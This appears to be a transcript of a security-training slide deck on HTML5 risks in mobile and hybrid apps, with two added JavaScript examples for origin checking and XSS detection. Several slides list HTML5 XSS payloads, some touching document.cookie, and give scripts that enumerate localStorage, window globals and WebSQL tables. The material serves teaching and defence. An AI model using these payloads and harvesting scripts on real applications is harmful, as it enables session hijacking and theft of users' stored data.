HTML5 on Mobile

HTML5-related mobile security issues and concerns.

  1. HTML5 and Mobile – © Blueinfy Solutions
  2. What is HTML5
     • An enhancement to HTML 4.01
       – with more tags
       – API support
       – functionality to support mobile devices
       – more types for existing tags
     • Does not mean old tags will not work
     • An existing application can be converted by changing the first line to “<!DOCTYPE html>”
  3. HTML5 in Mobile
     • It is changing the game
     • Apps are migrating to HTML5 with no need for native code
     • Web vs. Mobile
       – both can use HTML5
       – no need to manage several code bases
       – HTML + CSS + JS only
       – server-side services
  4. Technology Vectors
  5. What is running where?
     Diagram (layer/component matrix): Presentation Layer, Business Layer, Data Access Layer, Authentication, Communication etc., over Runtime, Platform and Operating System, split into server-side components, client-side (browser) components and mobile platforms. Technologies named: HTML5, DOM, XHR, WebSocket, Storage, WebSQL, Flash, Flex, AMF, Silverlight, WCF, XAML, .NET, JS, Android, iPhone/iPad, other mobile.
  6. HTML5 in a nutshell – Specs
     Sources: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png and http://html5demos.com/
     Evolution is driven by the Web Hypertext Application Technology Working Group (WHATWG).
  7. Key HTML5 features for Mobile
     • Offline web application support
     • Web Storage
     • Geolocation API
     • Canvas 2D drawing
     • Video and audio streaming support
  8. HTML5 features not supported on Mobile
     • Microdata
     • 3D animation
     • FileReader API
     • IndexedDB
     • WebWorkers
  9. Modern Browser Model
     Diagram: Presentation (HTML5 + CSS, Silverlight, Flash, plug-ins); Process & Logic (JavaScript, DOM/Events, Parser/Threads); Network & Access (XHR 1 & 2, WebSocket, plug-in sockets, browser native network services); Core Policies (SOP/CORS/Content-Security sandbox); Storage (WebSQL, mobile cache, FileSystem); API (Media, Geo etc.) & Messaging.
  10. Abusing HTML5 Tags
     • Various new tags can be abused and may not be filtered or validated
     • Media tags
         <video poster=javascript:alert(document.cookie)//
         <audio><source onerror="javascript:alert(document.cookie)">
     • Form tags
         <form><button formaction="javascript:alert(document.cookie)">foo
         <body oninput=alert(document.cookie)><input autofocus>
  11. Accessing media tags
  12. Moving/Touch
  13. Login cookie
  14. Profile
     • Fetch through storage – cookie not needed…
  15. WebSQL data
     • Through JavaScript one can store information in a database.
     • Example
  16. One time fetch
  17. Network calls
     • HTML5 provides WebSocket and XHR Level 2 calls
     • They allow cross-domain calls and raw socket capabilities
     • They can be leveraged by a JavaScript payload
     • Malware or a worm can use them to perform several scanning tasks
  18. Same Origin Policy (SOP)
     • The browser’s sandbox
       – protocol, host and port should match
       – it is possible to set document.domain to the parent domain if the current context is a child domain
       – locking down the top-level domain (TLD) helps in sandboxing the context
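The origin rule on slide 18, worked as an added JavaScript example (not code from the deck): sameOrigin compares scheme, host and port exactly, and canSetDocumentDomain applies the document.domain relaxation rule, allowing only a parent domain of the page's own host and refusing bare public suffixes. PUBLIC_SUFFIXES is a constructed stub; browsers consult the full public suffix list.

```javascript
// Same Origin Policy check as described on the slide: protocol, host and port
// must all match. Added example, not code from the deck.
// PUBLIC_SUFFIXES is a constructed stub; real browsers use the full public
// suffix list so that document.domain cannot be relaxed to e.g. "com".
const PUBLIC_SUFFIXES = new Set(['com', 'org', 'net', 'co.uk']);
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// Serialise a URL's origin as scheme://host:port, filling in the default port
// so that http://a.example.com and http://a.example.com:80 compare equal.
function originOf(url) {
  const u = new URL(url);
  const port = u.port || DEFAULT_PORTS[u.protocol] || '';
  return `${u.protocol}//${u.hostname.toLowerCase()}:${port}`;
}

// Two documents may touch each other's DOM and storage only when all three parts match.
function sameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// document.domain relaxation: a page at child.app.example.com may set
// document.domain to "app.example.com" or "example.com" (a parent domain),
// but not to an unrelated host and not to a bare public suffix (TLD lockdown).
function canSetDocumentDomain(pageUrl, newDomain) {
  const host = new URL(pageUrl).hostname.toLowerCase();
  const target = newDomain.toLowerCase().replace(/\.$/, '');
  if (target === '' || PUBLIC_SUFFIXES.has(target)) return false;
  if (target === host) return true;
  return host.endsWith('.' + target);
}

// Once both pages have relaxed document.domain to the same parent, the HTML
// spec resets the port in their effective origin, so only the scheme must
// still agree for them to become same-origin.
function sameOriginAfterDomainRelax(urlA, urlB, sharedDomain) {
  if (!canSetDocumentDomain(urlA, sharedDomain)) return false;
  if (!canSetDocumentDomain(urlB, sharedDomain)) return false;
  return new URL(urlA).protocol === new URL(urlB).protocol;
}
```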
  19. Fetching Location
  20. Location calls
  21. Hybrid App
     • Android
  22. Integrating native to webview
     • Hook your handlers to make it hybrid
     • Interact with the webview
  23. Set permissions
     • Manifest file
  24. Loading Hybrid App
  25. Slidebar type touch views
  26. HTML5 Attacks
  27. XSS with HTML5 (tags, attributes and events)
     Diagram: the browser model from slide 9 (Presentation, Process & Logic, Network & Access, Core Policies, Storage, API & Messaging), here headed “XSS with HTML5 (tags, attributes and events)”.
  28. HTML5 – Tags/Attributes/Events
     • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form control (keys)
     • Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
     • Events/Objects – navigation (_self), editable content, Drag-Drop APIs, pushState (History) etc.
  29. XSS variants
     • Media tags
     • Examples
       – <video><source onerror="javascript:alert(1)">
       – <video onerror="javascript:alert(1)"><source>
  30. XSS variants
     • Exploiting autofocus
       – <input autofocus onfocus=alert(1)>
       – <select autofocus onfocus=alert(1)>
       – <textarea autofocus onfocus=alert(1)>
       – <keygen autofocus onfocus=alert(1)>
  31. XSS variants
     • Form & Button etc.
       – <form id="test" /><button form="test" formaction="javascript:alert(1)">test
       – <form><button formaction="javascript:alert(1)">test
     • Etc … and more …
       – Nice HTML5 XSS cheat sheet (http://html5sec.org/)
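A defender-side check for the vectors listed on slides 10 and 29–31, added here as an example and not code from the deck: findXssVectors tokenises markup and flags any on* event-handler attribute and any javascript: URL in URL-valued attributes such as formaction, poster and src. URL_ATTRS and SAMPLES are constructed for the example.

```javascript
// Detection logic for the HTML5 XSS vectors on these slides: event-handler
// attributes on any tag (onerror, onfocus, oninput...) and javascript: URLs in
// URL-valued attributes (formaction, poster, src...). Added example, not deck code.
const URL_ATTRS = new Set(['formaction', 'action', 'poster', 'src', 'href', 'data']);
// A tag ends at ">" or at end of input (the poster= vector on slide 10 is never closed).
const TAG_RE = /<([a-z][\w-]*)([^>]*)(?:>|$)/gi;
// attribute name, optionally followed by ="..." / '...' / an unquoted value
const ATTR_RE = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

// Strip whitespace and control characters so "java\tscript:" is still recognised.
function normalizeUrl(value) {
  return value.replace(/[\s\x00-\x1f]/g, '').toLowerCase();
}

// Returns one finding per suspicious attribute: { tag, attr, reason }.
function findXssVectors(html) {
  const findings = [];
  for (const tagMatch of html.matchAll(TAG_RE)) {
    const tag = tagMatch[1].toLowerCase();
    for (const attr of tagMatch[2].matchAll(ATTR_RE)) {
      const name = attr[1].toLowerCase();
      const value = attr[2] ?? attr[3] ?? attr[4] ?? '';
      if (name.startsWith('on')) {
        findings.push({ tag, attr: name, reason: 'event handler attribute' });
      } else if (URL_ATTRS.has(name) && normalizeUrl(value).startsWith('javascript:')) {
        findings.push({ tag, attr: name, reason: 'javascript: URL' });
      }
    }
  }
  return findings;
}

// Constructed samples: the deck's own vectors plus benign media markup.
const SAMPLES = {
  poster: '<video poster=javascript:alert(document.cookie)//',
  sourceOnerror: '<audio><source onerror="javascript:alert(document.cookie)">',
  formaction: '<form id="test" /><button form="test" formaction="javascript:alert(1)">test',
  autofocus: '<body oninput=alert(document.cookie)><input autofocus>',
  benign: '<video src="movie.mp4" poster="cover.jpg" controls><source src="a.webm" type="video/webm"></video>',
};

// Scan every sample and return a name -> findings map.
function scanSamples() {
  const report = {};
  for (const [name, html] of Object.entries(SAMPLES)) report[name] = findXssVectors(html);
  return report;
}
```

A hit is a signal for a test suite or request log; contextual output encoding at the rendering point remains the actual fix.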
  32. Extraction through XSS
     • Once you have an entry point – game over!
  33. Web Storage and DOM information extraction
     Diagram: the browser model from slide 9 (Presentation, Process & Logic, Network & Access, Core Policies, Storage, API & Messaging), here headed “Web Storage and DOM information extraction”.
  34. Web Storage Extraction
     • Traditionally the browser has had one place to store data – the cookie (limited and replayed)
     • HTML5 – Storage API provided (Local and Session)
     • Can hold globally scoped variables
     • http://www.w3.org/TR/webstorage/
  35. Web Storage Extraction
     • It is possible to steal them through XSS or via JavaScript
     • Session hijacking – HttpOnly is of no use here
     • getItem and setItem calls
     • XSS the box and scan through storage
  36. Blind storage enumeration
         if (localStorage.length) {
           console.log(localStorage.length);
           for (var n = 0; n < localStorage.length; n++) {
             var key = localStorage.key(n);   // key(n) walks only stored entries, not prototype methods
             console.log(key);
             console.log(localStorage.getItem(key));
           }
         }
     • The code above extracts all storage variables
  37. File System Storage
     • HTML5 provides a virtual file system with filesystem APIs
         window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
     • It becomes a full-blown local file system for the application inside the sandbox
     • It empowers the application
  38. File System Storage
     • It provides a temporary or permanent file system
         var filesys;
         function catcherror(err) { console.error("requestFileSystem failed", err); }
         function init() {
           window.requestFileSystem(window.TEMPORARY, 1024 * 1024, function (filesystem) {
             filesys = filesystem;
           }, catcherror);
         }
     • The app can have a full filesystem in place now.
  39. Sensitive information in the filesystem
     • Assuming the app is creating a profile on the local system
  40. DOM Storage
     • Applications run with a “rich” DOM
     • JavaScript sets several variables and parameters while loading – GLOBALS
     • They hold sensitive information – what if they are GLOBAL and remain for the life of the application?
     • They can be retrieved with XSS
     • HTTP requests and responses go through JavaScript (XHR) – what about those variables?
  41. Blind Enumeration
         for (var i in window) {
           var obj = window[i];
           try {
             if (typeof obj == "string") {
               console.log(i);
               console.log(obj.toString());
             }
           } catch (ex) {}
         }
  42. Global Sensitive Information Extraction from DOM
     • HTML5 apps run on a single DOM
     • Having several key global variables, objects and arrays
         var arrayGlobals = ['my@email.com', "12141hewvsdr9321343423mjf dvint", "test.com"];
     • Post-DOM-based exploitation is possible, harvesting all these values.
  43. Global Sensitive Information Extraction from DOM
         for (var i in window) {
           var obj = window[i];
           if (obj != null) {                      // skips both null and undefined
             var type = typeof obj;
             if (type == "object" || type == "string") {
               console.log("Name:" + i);
               try {
                 console.log(JSON.stringify(obj));  // circular objects throw and are skipped
               } catch (ex) {}
             }
           }
         }
  44. SQL Injection
     • WebSQL is part of the HTML5 specification; it provides a SQL database inside the browser itself.
     • Allows one-time data loading and offline browsing capabilities.
     • Causes security concerns and creates potential injection points.
     • Injection through its methods and calls is possible
  45. SQL Injection
     • Through JavaScript one can harvest the entire local database.
     • Example
  46. Blind WebSQL Enumeration
     • We need the following to exploit
       – the Database object
       – the table structure created on SQLite
       – the user table on which we need to run the select query
  47. Blind WebSQL Enumeration
         var dbo, table, usertable;
         for (var i in window) {
           var obj = window[i];
           try {
             if (obj.constructor.name == "Database") {
               dbo = obj;
               obj.transaction(function (tx) {
                 tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [],
                   function (tx, results) {
                     table = results;
                     // results arrive asynchronously, so the row check belongs inside the callback
                     if (table.rows.length > 1) usertable = table.rows.item(1).name;
                   }, null);
               });
             }
           } catch (ex) {}
         }
  48. Blind WebSQL Enumeration
     • We run through all objects and get the object whose constructor is “Database”
     • We make a SELECT query directly against sqlite_master
     • We grab the 1st table, leaving the WebKit table at the 0th entry
  49. Blind WebSQL Enumeration
  50. Conclusion